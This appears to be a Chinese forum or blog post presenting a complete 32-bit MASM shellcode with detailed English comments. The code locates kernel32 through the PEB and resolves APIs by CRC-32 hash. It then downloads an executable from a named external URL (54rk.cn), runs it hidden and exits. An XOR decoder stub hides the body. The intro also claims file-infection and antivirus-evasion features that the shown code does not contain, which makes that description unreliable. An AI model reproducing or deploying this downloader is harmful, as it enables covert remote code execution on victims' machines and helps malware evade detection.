asm编写的只有268字节的shellcode
作者:拉伸
具备文件感染,入口代码变形,自身加密,EPO等功能,无任何
特征码的病毒,设计目的是为对抗反病毒软件的特征码杀毒、行为杀毒和虚拟机杀毒,现有代码
未提供任何破坏功能,但会主动感染可执行文件,而且被感染过的文件很难再还原,这点请注意
------很早以前的了------------
(code)
; MASM, 32-bit x86, flat model, stdcall. The shellcode body is assembled into
; the .DATA section below (it rewrites its own bytes, see _ShellCodeStart);
; the .CODE entry point only jumps into it.
.486p
.model flat, stdcall
option casemap :none
;--------------------------------------------------------
; CRC32 str
; Assembly-time macro: emits one dword holding the CRC-32 of the characters
; of <str> (reflected polynomial 0EDB88320h, initial value 0FFFFFFFFh,
; final XOR 0FFFFFFFFh). GetApiAddressFromList executes the same
; bit-for-bit algorithm at run time over each export name, so the emitted
; dword is compared directly against those run-time hashes.
; NOTE(review): &CRC_BYTE is substituted unquoted into the expression —
; confirm the assembler evaluates it as the character's byte value.
CRC32 MACRO str
; init value
CRC_VALUE = 0ffffffffh
; one pass per character of str
IRPC CRC_BYTE, str
CRC_VALUE = CRC_VALUE xor &CRC_BYTE
; eight shift/xor steps per byte
REPT 8
CRC_VALUE = (CRC_VALUE shr 1) xor ((CRC_VALUE and 1) * 0edb88320h)
ENDM
ENDM
; final inversion, then emit as a dword
CRC_VALUE = CRC_VALUE xor 0ffffffffh
dd (CRC_VALUE and 0ffffffffh)
ENDM
; APIDEF sym
; Emits the CRC-32 of the API name <sym> as one dword at data offset COUNT
; and defines <sym> as the operand [ebp + COUNT], i.e. that same slot.
; GetApiAddressFromList later overwrites the slot with the resolved address,
; so "call sym" becomes an indirect call through the slot (with ebp =
; EncryptDataStart). Advances COUNT by 4.
; NOTE(review): numeric equate of a bracketed operand — confirm the
; assembler accepts this form.
APIDEF MACRO sym
CRC32 sym
sym = [ebp + COUNT]
COUNT = COUNT + 4
ENDM
; VARDEF sym, vw
; Reserves vw bytes of offset space at COUNT without emitting any data;
; <sym> becomes that offset (to be addressed as [ebp + sym]).
; Not used by the code in this file.
VARDEF MACRO sym, vw
sym = COUNT
COUNT = COUNT + vw
ENDM
; STRDEF sym, str
; Emits <str> as a NUL-terminated string at data offset COUNT; <sym> is the
; offset of its first byte (addressed as [ebp + sym]). Advances COUNT by
; the string length plus the terminator.
STRDEF MACRO sym, str
local sss
sym = COUNT
sss:
db str, 0
COUNT = COUNT + ($ - sss)
ENDM
; pushsz str
; Pushes the address of an inline NUL-terminated copy of <str>: the CALL's
; return address is the byte right after it (the string itself), and
; execution lands on the local label past the string.
pushsz MACRO str
local pushstr
call pushstr
db str, 0
pushstr:
ENDM
;--------------------------------------------------------
.DATA ; shellcode is placed in writable data because the stub below patches its own bytes
;****************************************************************************
; Decoder stub. Finds its own address (ebp = EncryptDataStart) and XORs every
; byte from EncryptDataStart up to _ShellCodeEnd with a one-byte key, then
; jumps into the decoded body.
;****************************************************************************
_ShellCodeStart:
jmp delta1
delta2:
pop ebp ; ebp = return address pushed by "call delta2" = EncryptDataStart
xor ecx, ecx
mov cl, _ShellCodeEnd - EncryptDataStart ; byte count; 8-bit, so the covered region must be < 256 bytes
LoopCodeDecrypt:
xor byte ptr [ebp + ecx - 1], 0 ; key is 0 here, so as assembled this loop leaves the bytes unchanged; presumably patched by an external encoder — TODO confirm
loop LoopCodeDecrypt ; walks offsets ecx-1 down to 0
jmp EncryptCodeStart
delta1:
call delta2 ; GetPC trick: pushes the address of the next byte, EncryptDataStart
;--------------------------------------------------------
; Data area, addressed as [ebp + offset] with ebp = EncryptDataStart.
; Layout (COUNT tracks the running offset):
;   KNLAPILIST  five CRC-32 hashes of kernel32 export names, 0-terminated;
;               overwritten in place with the resolved addresses.
;   URLAPILIST  one hash (URLDownloadToFileA), 0-terminated, resolved from
;               the module returned by LoadLibraryA("urlmon.dll").
;   ExeUrl      NUL-terminated URL handed to URLDownloadToFileA.
; GetApiAddressFromList does not rewind its name index between slots, so
; each list must be in the order the names appear in the module's export
; name table (alphabetical in practice); the lists below are.
EncryptDataStart:
COUNT = 0
KNLAPILIST = COUNT
APIDEF ExitProcess
APIDEF GetTempFileNameA
APIDEF GetTempPathA
APIDEF LoadLibraryA
APIDEF WinExec
dd 00h ;ENDLIST
COUNT = COUNT + 4
URLAPILIST = COUNT
APIDEF URLDownloadToFileA
dd 00h ;ENDLIST
COUNT = COUNT + 4
STRDEF ExeUrl, "http://www.54rk.cn/1.exe"
; STRDEF UrlMon, "urlmon.dll"
;--------------------------------------------------------
; Decoded body. Register roles: ebp = EncryptDataStart (data base),
; ebx = 0 (reused for every NULL/zero argument), edi = 260 (buffer size).
; Flow: locate a module base via the PEB loader list, resolve the hashed
; kernel32 imports, load urlmon, download ExeUrl to a temp file, run it
; hidden, exit. No return value is checked anywhere: a failed download
; still reaches WinExec with the (possibly empty) temp file.
EncryptCodeStart:
push 30h
pop esi ; esi = 30h
lods dword ptr fs:[esi] ;Peb ; eax = fs:[30h]
mov eax, [eax + 0ch] ;Ldr
mov esi, [eax + 1ch] ;InInitializationOrderModuleList
lodsd ;ntdll.dll ; eax = Flink of the first entry, i.e. the second entry in the list
mov edx, [eax + 8] ;kernel32.dll ; DllBase of that entry; assumed to be kernel32 — NOTE(review): this position is OS-version dependent
lea edi, [ebp + KNLAPILIST]
call GetApiAddressFromList ; resolve the kernel32 hash list in place
pushsz "urlmon.dll" ;lpLibFileName ; pushes the address of the inline string
call LoadLibraryA ; call [ebp + 12]: load the DLL exporting URLDownloadToFileA
xchg edx, eax ; edx = urlmon base, the resolver's module argument
lea edi, [ebp + URLAPILIST]
call GetApiAddressFromList ; resolve URLDownloadToFileA in place
xor ebx, ebx ; ebx = 0 for every NULL/0 argument below
mov edi, 260 ; MAX_PATH
sub esp, edi ; buffer 1 (260 bytes): temp directory path
push esp ;lpBuffer
push edi ;nBufferLength
call GetTempPathA ; temp directory path into buffer 1
mov eax, esp ; eax = buffer 1 (stdcall callee popped the args)
sub esp, edi ; buffer 2 (260 bytes): temp file name
push esp ;lpTempFileName
push ebx ;wUnique ; 0 = let the API choose a unique name
push ebx ;lpPrefixString ; NULL prefix — NOTE(review): confirm the API accepts NULL here
push eax ;lpszPath
call GetTempFileNameA ; temp file name into buffer 2
mov eax, esp ; eax = buffer 2
push ebx ;lpfnCB
push ebx ;dwReserved
push eax ;szFileName
lea eax, [ebp + ExeUrl]
push eax ;szURL
push ebx ;pCaller
call URLDownloadToFileA ; download ExeUrl to the temp file; HRESULT ignored
mov eax, esp ; eax = buffer 2 again
push ebx ;uCmdShow ; 0 = SW_HIDE
push eax ;lpCmdLine
call WinExec ; run the downloaded file
push ebx ;uExitCode
call ExitProcess ; terminate the host process
;****************************************************************************
; GetApiAddressFromList
; In:   edx = image base of the module to search
;       edi = list of dword CRC-32 hashes of export names, ended by a 0 dword
; Out:  each hash slot is overwritten with the resolved export address
; Clob: no registers (pushad/popad); memory at [edi] is rewritten
; Walks the export name table once, hashing each name with the same CRC-32
; as the CRC32 macro and comparing it with the current slot. The name index
; (ebp) is NOT reset between slots, so the list must be in export-name-table
; order. The index is unbounded: a hash that is absent from the module reads
; past the table, and a module with no export directory is not handled —
; either case crashes rather than failing cleanly.
;****************************************************************************
GetApiAddressFromList:
pushad
mov ecx, [edx + 3ch] ; e_lfanew
add ecx, edx ; ecx = IMAGE_NT_HEADERS
mov ebx, [ecx + 78h] ; export directory RVA (DataDirectory[0])
add ebx, edx ; ebx = IMAGE_EXPORT_DIRECTORY
or ebp, -1 ; name index, pre-incremented to 0 below (caller's ebp is saved by pushad)
SearchNextAPI:
mov ecx, [ebx + 20h] ;AddressOfNames
add ecx, edx
ContinueSearch:
inc ebp
mov eax, edx
add eax, [ecx + ebp * 4] ; eax = address of the current export name
pushad ; eax/ecx/edx are scratch inside the hash loop
or edx, -1 ; CRC init value
@1:
mov ch, [eax]
test ch, ch
jz @4 ; NUL terminator reached
inc eax
xor dl, ch
mov cl, 8 ; eight bit-steps per byte
@2:
shr edx, 1
jnc @3
xor edx, 0edb88320h
@3:
dec cl
jnz @2
jmp @1
@4:
not edx ; final inversion
cmp [edi], edx ; compare with the wanted hash
popad ; restores registers; flags survive
jne ContinueSearch
mov eax, [ebx + 24h] ;AddressOfNameOrdinals
add eax, edx
movzx eax, word ptr [eax + ebp * 2] ; ordinal of the matched name
mov ecx, [ebx + 1ch] ;AddressOfFunctions
add ecx, edx
mov eax, [ecx + eax * 4] ; function RVA
add eax, edx ; absolute address
stosd ; overwrite the hash slot, edi -> next slot
cmp dword ptr [edi], 0 ; the hash list ends with a 0 dword
jne SearchNextAPI
popad
ret
_ShellCodeEnd: ; end of the region covered by the decoder loop
;--------------------------------------------------------
.CODE
; Host entry point: only transfers control into the .DATA-resident shellcode.
start:
jmp _ShellCodeStart
end start